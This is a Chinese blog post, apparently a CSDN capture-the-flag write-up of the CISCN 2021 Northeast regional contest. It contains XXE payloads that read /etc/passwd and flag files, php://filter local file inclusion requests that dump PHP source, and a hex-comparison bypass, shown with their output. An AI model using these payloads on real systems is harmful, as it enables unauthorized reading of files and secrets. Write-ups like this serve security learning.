ciscn2021东北赛区分区赛

最新推荐文章于 2022-12-03 22:51:28 发布
最新推荐文章于 2022-12-03 22:51:28 发布
阅读量641 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kingdring/article/details/117935561
版权

ciscn2021东北赛区分区赛

++Spirit k1ling
感谢Dazz1e大佬陪我看了很久hh

summary

3720pt,rank11
晋级名单还没出,不过大概率是前10进,正好卡掉了,就差一步到罗马,真的意难平…
但是想想自己菜成这样全靠gs带也就释然了一些
这东西就跟S赛一样,今年没了你就要咽下所有的不甘,然后更加努力,等着明年杀回来
++Spirit绝不会止步于此
今年进第二轮之后改了个名,k某人想去ciscn决赛,去决赛之前不改名,不管哪年,flag立这了。

misc

签到

工具扫二维码即可

flag{this_is_flag!gogogo}

web

flagin

拿到题目,抓包发现表单内容是这样的

<user><username>1;</username><password>1</password></user>

怀疑是xxe

上payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>

发现第一行被waf了,删掉

可以读到passwd,去读flag

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///flag.txt">
]>

回显读取flag的姿势不对

换协议filter

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=///flag.txt">
]>

回显一段base64

ZmxhZ3s0OTc5MDBhYThmMmZjNTU3NmI0ZGEzZmNkNzhjMDA4ZH0=

flag{497900aa8f2fc5576b4da3fcd78c008d}

be careful

进去环境看到file=1.php

猜测也可以读文件

file=///etc/passwd

可以读到内容

读一下index.php,没回显

猜测又是协议问题,换filter

file=php://filter/read=convert.base64-encode/resource=index.php

读到了index.php的源码

<html>
    <title>I advise you to do good</title>
<?php
    error_reporting(0);
    if(!$_GET[file]){echo '<a href="./index.php?file=1.php">Be Careful</a>';}
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,'F14ggg.php')||stristr($file,"input")||stristr($file,"data")){
        echo "I advise you to do good!";
        exit();
    }
    include($file); 
//real_flag.php
?>
</html>

可以看到不能路径穿越,不能ftp,不能直接访问flag等等

但是注释里面有一个real_flag.php

读一下

file=php://filter/read=convert.base64-encode/resource=real_flag.php

源码是这样的

<?php
include('F14ggg.php');
$a = $_GET['a'];
$one = ord('1'); 
$nine = ord('9'); 
$number = '69563214562';
for ($i = 0; $i < strlen($number); $i++)
{
	$digit = ord($a{$i});
    echo $digit;
	if ( ($digit >= $one) && ($digit <= $nine) )
	{
		echo 'wrong';
	}

	elseif($number == $a)
	{
		echo $flag;
	}
}
?>

可以看到,只要在11位长度之内,存在一位不是1-9之间的字符,并且使得$a与69563214562相等,即可echo $flag;

考虑hex绕过,原因有二:

  • hex前缀是0x,必然不在1-9之内
  • php可以比较16进制与10进制

因此请求 /real_flag.php?a=0x10324a6ae2

flag为

flag{ny2w6iezylnlamxfijufowhcpevjqdzd}

「已注销」
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
2022 ciscn 东北赛区分区赛 部分 wp
qq_23321269的博客
06-19 5329
2022 ciscn 东北分区赛 部分wp
CISCN分区赛东北部分wp
Htt9999的博客
06-27 737
东北分区赛部分wp
BUUCTF-[CISCN2019 华东北赛区]Web2
AndyNoel的博客
05-13 393
BUUCTF-[CISCN2019 华东北赛区]Web2 看题 一个论坛,内容不错:) 可以投稿,点击投稿发现要注册,那就先注册登录。随便账号密码就行。 常规操作,扫一下站点,发现有admin.php,进行访问 思路 有session,可以确定一个思路,获取管理员的session得到权限,然后拿到flag 执行 去投稿,发现存在XSS漏洞,但是有一些过滤,''(''被转义成了"(",存在WAF,先转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新页面 使用
CISCN2022东北赛区复赛Writeup-MapleLeaves
Do1phln的博客
06-19 3104
Do1phln b477ery sfc9982 0HB密文中字母跨度在 G-K 间,不禁让人想往 A-F 平移,平移后即为且全部为可打印 ASCII 文本。 拖入本地离线 CyberChef 中先使用Base32,再使用Base85 IP method 解密得到 flag分析音频,无有效信息。加之题目体制侧重于文件方向,使用 010 Editor 打开音频文件,在尾部发现类似 Base64 的文本信息,经过两次解密后得到某个东西的密码。 初步考虑文件内含压缩包或者音频存在隐写信息。经多个工具尝试过后发现
ciscn-2022 东北赛区分区赛 RE-hana
qq_34010404的博客
07-20 517
逆向太菜了,当时没逆出来,今天复现一下,虽然出了,但是是下断点断出来的…
2021 DASCTF八月挑战赛
weixin_43610673的博客
08-30 2752
babypython[国赛总决赛复现] 看着像是[HCTF 2018]Hide and seek 这题改的,和[CISCN2019 华东南赛区]Web4的加密SECRET_KEY的方式也一样 进去提示要变admin,想到session伪造,直接jwt.io伪造不了,需要SECRET_KEY。上传文件只能为zip ,软链接zip 读取文件。 ln -s /etc/passwd passwd zip --symlinks passwd.zip passwd 读取/proc/self/environ提示bad
下载思科模拟器Cisco packet Tracer 8.2.2
05-28
Cisco packet Tracer 8.2.2用于思科实验,练习使用。非常方便。
思科cisco实验内容练习.zip
09-25
思科模拟器各种设备练习,包含1.交换机的基本配置2.连接有线和无线配置3.第 3 层交换机4.路由器基本配置及排除i 5.pv4和ipv6编址6.子网划分7.服务器8.无线路由器9.扩展练习-.端口安全
思科MIB库 cisco mib库
10-14
标题中的“思科MIB库 cisco mib库”指的是思科公司为他们的网络设备提供的MIB资源集合。这些库包含了用于描述和访问思科交换机、路由器以及其他网络设备管理信息的结构化数据。 描述中的“思科V2MIB库”提及的是...
思科仿真模拟器cisco packet tracer6.2
03-07
cisco packet tracer 6.2是由思科推出的一款仿真模拟器,主要用于思科各类设备的模拟学习操作,包括交换机、路由器的模拟,旨在帮助初学者进行各类网络的设计、配置、排除网络故障等,用户还可以在软件的图形用户...
Zeitgeist-Cisco-Hackathon-2021:思科Hackathon 2021
03-15
【标题】"Zeitgeist-Cisco-Hackathon-2021:思科Hackathon 2021" 涉及的是一个由科技巨头思科主办的编程竞赛,其主题聚焦于医疗追踪领域的创新应用。这个活动鼓励参赛者利用各种技术手段,特别是区块链技术,来解决...
[CISCN 2022 东北]听说这是一个二维码
qq_47875210的博客
12-03 680
复现过程如下: 得到密码:Sound from deep --> ,想到工具,拖到工具中,提示输入密码,密码为0和255,可以代表0或者1,所以写个代码,提取一下所有的ip,然后得到二进制字符串 运行后,得到,现在是2进制转图片了,这一步毕竟简单,实现代码如下: 运行效果: 可以看到这两个,比较像,使用在线网站:戳我打开!flag{c736863427be5671102c039d43f0c75b}
文件任意读取和强碰撞
qq_53142368的博客
08-31 1842
文章目录一、babypython[国赛总决赛复现]考点:硬链接读取任意文件、伪造session二、BUUCTF-[安洵杯 2019]easy_web总结 一、babypython[国赛总决赛复现] 考点:硬链接读取任意文件、伪造session 这个题当时打开是一个文件上传 然后上传一个文件 显示需要上传zipfile,当时用bp拦截 改zip 上传成功后 没有回显文件的路径 然后就卡住了 后来发现这个题考点是 硬链接读取任意文件 伪造session ln -si /app/y0u_found_it.i
ciscn2022-线上-半决-pwn
m0_51185908的博客
09-13 1490
ciscn2022-线上-半决-pwn
第15届全国大学生知识竞赛 2022ciscn初赛 部分wp
blowed的博客
05-31 1509
Misc ez_usb 1.键盘流量 USB协议数据部分在Leftover Capture Data域中,数据长度为八个字节。其中键盘击键信息集中在第三个字节中。 如图,发现击键信息为0x06,即对应的按键为C 2.鼠标流量 USB协议鼠标数据部分在Leftover Capture Data域中,数据长度为四个字节。 其中第一个字节代表按键,当取0x00时,代表没有按键、为0x01时,代表按左键,为0x02时,代表当前按键为右键。 第二个字节可以看成是一个signed byte类型,
[2022 CISCN]初赛 web题目复现
cosmoslin的博客
07-04 3964
源码泄露www.zip,用网上的链子直接打 online_crt 考点:CVE-2022-1292SSRF项目后端为python+go,其中python部署在外网,go通过python转发到内网先看python,一共有四个路由:为主界面生成一个x509证书调用c_rehash创建证书链接通过代理访问go内网服务再来看go,有一个admin路由,用以重命名证书文件题目的考点为CVE-2022-1292,是c_rehash的一个命令注入漏洞c_rehash是openssl中的一个用perl编写的脚本工具,用于批
ciscn 2022 华东北分区赛pwn blue
z1r0的博客
07-02 773
开了沙盒 最简单的解法还是借助environ来控制ret地址,然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址,因为show功能只能使用一次。 这一题的漏洞点是一次性的uaf漏洞,在666功能下 我们首先先借助这一次性的uaf泄露出libc。还是填满tcache,只不过下一个进unsorted bin的时候利用666这个uaf功能。 接下来思考一下如何泄露出environ里面的值,show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露,将flags
C语言编写简易学生管理系统
最新发布
07-08
C语言编写简易学生管理系统
cisco思科交换机配置手册
09-25
思科交换机配置手册是为了帮助用户学习和了解如何配置和管理思科交换机的详细指南。手册涵盖了各种交换机系列和模型的配置过程,并提供了详细的步骤和示例,以帮助用户轻松配置和优化交换机的性能和功能。 该手册通常包括以下内容: 1. 基本配置:手册会介绍如何进行基本的交换机配置,例如设置主机名、IP地址、默认网关、登录密码等。用户可以根据自己的需求和网络环境进行适当的配置。 2. VLAN配置:手册会详细介绍如何配置虚拟局域网(VLAN),包括创建VLAN、将端口分配给VLAN、配置VLAN间的互连等。这有助于用户更好地管理网络流量和隔离不同部门或用户组的通信。 3. STP和RSTP配置:手册会解释和指导如何配置生成树协议(STP)和快速生成树协议(RSTP),以避免网络中的环路,并提高网络的容错性和可靠性。 4. 交换机安全配置:手册会介绍如何配置交换机的安全功能,如端口安全、MAC地址过滤、访问控制列表(ACL)等,以保护网络免受未经授权的访问和恶意攻击。 5. QoS配置:手册会指导如何配置服务质量(QoS)功能,以优化网络性能和保证关键应用的带宽和优先级。 除了这些基本配置外,手册通常还包括其他高级配置,如多协议标签交换(MPLS)、交换机堆叠配置、VTP配置等,以满足不同用户对交换机的特定要求和功能需求。 总结起来,思科交换机配置手册是一个重要的参考工具,它可以帮助用户详细了解和学习如何配置和管理思科交换机,优化网络性能和管理网络安全。无论是初学者还是有经验的网络管理员,都可以从中获得所需的指导和帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值